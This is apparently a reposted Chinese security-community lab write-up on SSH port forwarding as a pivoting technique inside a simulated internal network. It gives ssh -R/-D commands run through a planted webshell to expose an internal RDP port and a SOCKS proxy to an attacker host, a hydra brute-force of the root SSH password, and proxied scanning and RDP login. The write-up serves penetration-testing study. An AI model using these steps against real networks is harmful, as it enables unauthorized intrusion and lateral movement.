基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区

0x01 SSH隧道概念

SSH隧道是把其他的网络协议封装到SSH协议进行传输的技术,也被称为端口转发。SSH 端口转发能够提供两大功能:一是加密 SSH Client 端至 SSH Server 端之间的通讯数据。二是突破防火墙的限制完成一些之前无法建立的 TCP 连接。

0x02 工具介绍

1. ssh

ssh主要用于远程主机登陆,还可以进行本地端口转发、远程端口转发和动态端口转发(转发socks)。

ssh常用命令说明:

1.将server_ip1服务器的port2端口通过中间服务器(server_ip2)转发到本地服务器的port1端口。
ssh -Nf -L port1:server_ip1:port2 server_ip2 

2.将server_ip1服务器的port2端口转发到远程服务器(server_ip2)的port1端口。
ssh -Nf -R port1:server_ip1:port2 server_ip2

3.转发远程服务器(server_ip)的socks到本地服务器的1080端口。
ssh -Nf -D 1080 server_ip

4.相关参数说明:
-N 不执行远程指令
-f 在后台运行ssh
-L 本地端口转发
-R 远程端口转发
-D 动态端口转发

0x03 实验环境搭建

一. 实验环境拓扑图

图片[1]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

二. 搭建实验环境

R1、R2、R3、FW3、FW5均为“百香果”内网沙场拓扑图设备,开启后,其中FW3需配置NAT端口,将内网10.10.13.110的80端口映射到66.28.7.2的80端口。

图片[2]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

IP为66.28.6.110,虚拟网卡为仅主机VM6。

内网WEB 服务器为一台Linux服务器,已被传了一个webshell,shell外网访问方式为: http://66.28.7.2/shell.php。

内网DATA数据库服务器为一台windows2003服务器,在FW3上配置ACL使得该服务器无法访问公网环境。

图片[3]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

图片[4]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

0x04 SSH隧道实验

一. 实验一

1.实验目的
利用SSH的远程端口转发功能,使Kali以内网WEB服务器为跳板,将内网DATA数据库服务器的3389端口转发到Kali的43389端口,攻击主机Kali就可以登录到内网DATA数据库服务器远程桌面。

2.实验步骤
(1) 用冰蝎连接上传到内网WEB服务器的webshell,通过冰蝎的虚拟终端执行下面命令后,就可以实现内网DATA数据库服务器的3389端口转发到远程攻击主机Kali的43389端口。

ssh -Nf -R 43389:10.10.16.110:3389 [email protected]

图片[5]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(2) 访问Kali的43389端口就相当于访问DATA数据库服务器的3389端口,所以在Kali执行下面命令,远程登陆到内网的DATA数据库服务器。

rdesktop 127.0.0.1:43389

图片[6]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

二. 实验二

1.实验目的
利用SSH的远程端口转发和动态端口转发功能,实现WEB服务器socks转发,就可以在Kali上配置socks代理对内网进行漏洞扫描;这里可以使用两种方法转发WEB服务器socks。

2.实验步骤

第一种方法:
(1) 用冰蝎连接上传到内网WEB服务器的webshell并在冰蝎的虚拟终端执行下面命令,将内网WEB服务器的22端口远程转发到Kali的2222端口。

ssh -Nf -R 2222:127.0.0.1:22 [email protected]

图片[7]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(2) 由于后续实验需要用到WEB服务器ssh的root账户登录密码,所以使用hydra工具暴破web服务器ssh的root账户登录密码,命令如下,如下图已成功的爆破出root的密码,并使用此密码登录内网WEB服务器。

hydra -lroot -P pass.txt ssh://127.0.0.1:2222ssh [email protected] -p 2222

图片[8]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科图片[9]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(3) 在Kali上执行下面命令,实现内网WEB服务器socks转发;查看Kali的端口开放情况,已成功实现内网WEB服务器socks转发。

ssh -Nf -D 1080 127.0.0.1 -p 2222netstat -ano | more

图片[10]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(4) 在kali中使用goby对内网进行漏洞扫描,先配置socks代理再进行漏洞扫描;扫描的结果与内网实际情况是一致的,进一步证明内网WEB服务器socks转发是成功的。

图片[11]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

图片[12]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(5) 由上面的内网漏洞扫描结果得知IP为10.10.16.110(DATA数据库服务器)的3389端口是开放的,所以使用proxychains代理工具远程登陆DATA数据库服务器。

proxychains rdesktop 10.10.16.110

图片[13]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

第二种方法:
(1) 先在冰蝎的虚拟终端执行下面命令,将内网WEB服务器的socks转发到它本地的1080端口。

ssh -Nf -D 1080 [email protected]

图片[14]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(2) 然后再把内网WEB服务器的1080端口远程转发到攻击主机Kali的1080端口,命令如下:

ssh -Nf -R 1080:127.0.0.1:1080 [email protected]

图片[15]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

(3) 然后就可以在goby上配置socks代理,对内网进行漏洞扫描;根据扫描结果,可以确认成功实现了内网WEB服务器socks转发。

图片[16]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科图片[17]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

参考链接

1.https://www.cnblogs.com/pandachen/p/11336020.html

2.http://blog.itpub.net/69955379/viewspace-2669971/

3.https://blog.csdn.net/JackLiu16/article/details/80640467

4.https://wenku.baidu.com/view/f69d59136edb6f1aff001fb5.html

图片[18]-基于百香果内网安全沙盘的SSH隧道研究 – 作者:漏斗社区-安全小百科

来源:freebuf.com 2021-03-23 10:14:44 by: 漏斗社区

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论